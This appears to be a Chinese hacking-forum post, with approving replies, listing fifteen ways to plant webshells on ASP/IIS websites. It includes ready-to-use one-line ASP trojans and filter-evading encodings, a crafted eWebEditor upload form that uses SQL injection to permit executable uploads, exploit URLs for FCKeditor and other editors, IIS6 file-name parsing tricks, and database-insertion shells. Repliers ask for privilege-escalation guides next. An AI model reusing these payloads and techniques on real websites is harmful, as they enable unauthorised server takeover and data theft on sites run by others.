返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
% w! B4 }; W& C; p) {& x0 i
1 g$ }; H0 y1 L8 ?' x8 W2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp& G% M, h( \; H. Q# p
6 y+ s* i2 Z4 `% Q
3.上传漏洞:; @+ X2 V4 _% i4 a7 [& x

; D' \. [9 F7 I% G. S% B1 `动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00, L" G6 d% t; T
( G6 c/ _9 s- Y( r$ S
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件0 t" u1 X: D9 x! Z8 P

+ e' u. `+ v0 |9 K, ?( V雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp& a- }8 r& H" s3 {% `. O1 `, K
然后在上传文件里面填要传的图片格式的ASP木马
1 R& \! \2 s! K. _- t; ^; }就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp7 b" s# _% A; l7 m/ U- \
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
) V' a, h6 p" H- I# D
! j* T% I8 k( g% R' k<html>
( l6 `' p- W5 u. d7 i3 l8 S  x<head>' A6 c" ~2 U. n
<title>ewebeditor upload.asp上传利用</title>
: G' @/ L) ^$ N/ a3 O, y0 l</head>$ ?5 j$ x5 Y+ K# l# h
<body>0 a: \+ r: `9 a  f+ r$ F3 o
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">' l  x0 r: h$ o" s
<input type=file name=uploadfile size=100><br><br>- w& A, t/ r9 E! j+ k
<input type=submit value=Fuck>  P$ m+ D1 [: K3 v7 h& f. s' x( Z9 w% k
</form>
. A# k; k3 [: a  C4 P</body>7 u* Q: ~( _" [- h; x# W
</form>  j# W8 r, h8 I, i$ t1 ]' b. i# q
</html>* ~* y! G; L6 n. m, m
5 R2 u/ B! n, S/ q% _+ [
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问2 h7 G" f: J. R0 U3 ~
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
% N8 A5 b5 m, Q( c6 E* H, ~
3 g* D; C7 a; H/ A! |: V利用windows2003解析。建立zjq.asp的文件夹) p5 A6 V2 b8 j6 t

+ U# O) E* z& D! L( K1 Q, ~4 X2 ^6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
0 Z* |3 f' p& T4 M6 p5 F
# T) S2 W5 L  p6 B3 F. @7.cuteeditor:类似ewebeditor
/ w1 k8 }9 m6 Y' {: u& M$ X) `5 D
3 P' g2 Y; ^: o0 C8.htmleditor:同上( B* w- V- x& l. z6 D( z

8 W% Q5 a- N. Q- C0 z7 \9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破* h0 r* d3 R! N) ?6 ?' e
6 ]# r3 }6 d6 N
<%execute request("value")%><%'<% loop <%:%>
1 b- c$ R! S- p' [% {  |5 v
9 N* B# u" n' G5 Y3 X/ Z1 |4 B<%'<% loop <%:%><%execute request("value")%>
' E- t( s1 X- E) ^' l( Q& u4 p9 Q. \- E/ Q1 o" ]" M
<%execute request("value")'<% loop <%:%>
$ R7 `4 G3 D8 T8 a1 D, _9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞6 e1 [5 {: A* H9 r  q

8 d! \8 h- S  T4 [% L10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞( o+ _6 w- _( j3 K$ Y8 D1 h3 [2 x. W& x
, p& C7 C0 o4 ~& J5 d
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
8 Y' `$ c! H& u+ \
2 A7 \7 f/ `' w( m' q& J1 @3 A2 q: u+ \解析漏洞得到webshell  K' h* d$ Z$ Q. G+ @5 i

) n- ?6 T, _+ a12.mssql差异备份,日志备份,前提需知道web路径
5 e; L! H5 G3 |5 Y/ z" L
. r! l5 }. o6 l. p) z13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
: D  \. e/ G' o) r# ~
& H' N/ L( v8 ~+ a! f( S* a14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell8 b  e6 G; t0 H  z; H

6 k$ C1 |7 [6 u+ |2 ?15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可& o/ |8 X, v4 c: @7 I. w: ]) Q

2 q& _; `, O  U3 _9 d以上只是本人的一些拙见,并不完善,以后想到了再继续添加  \/ \+ }6 t* W
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 # e" V3 `6 @6 V6 J

& p, B, I% s* P' N* r+ }! n5 v# V4 M. o% i7 E. }
很好啊、基本的入侵方法都包含了0 X. F' B2 O; @( e" G; K  j
# F: A" h4 l/ `/ l3 ~( Y" z. w
最好来个提权的帖子再。1 G3 {8 W! w# n& w% M3 d

, e& D: T9 R0 V% r& V不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表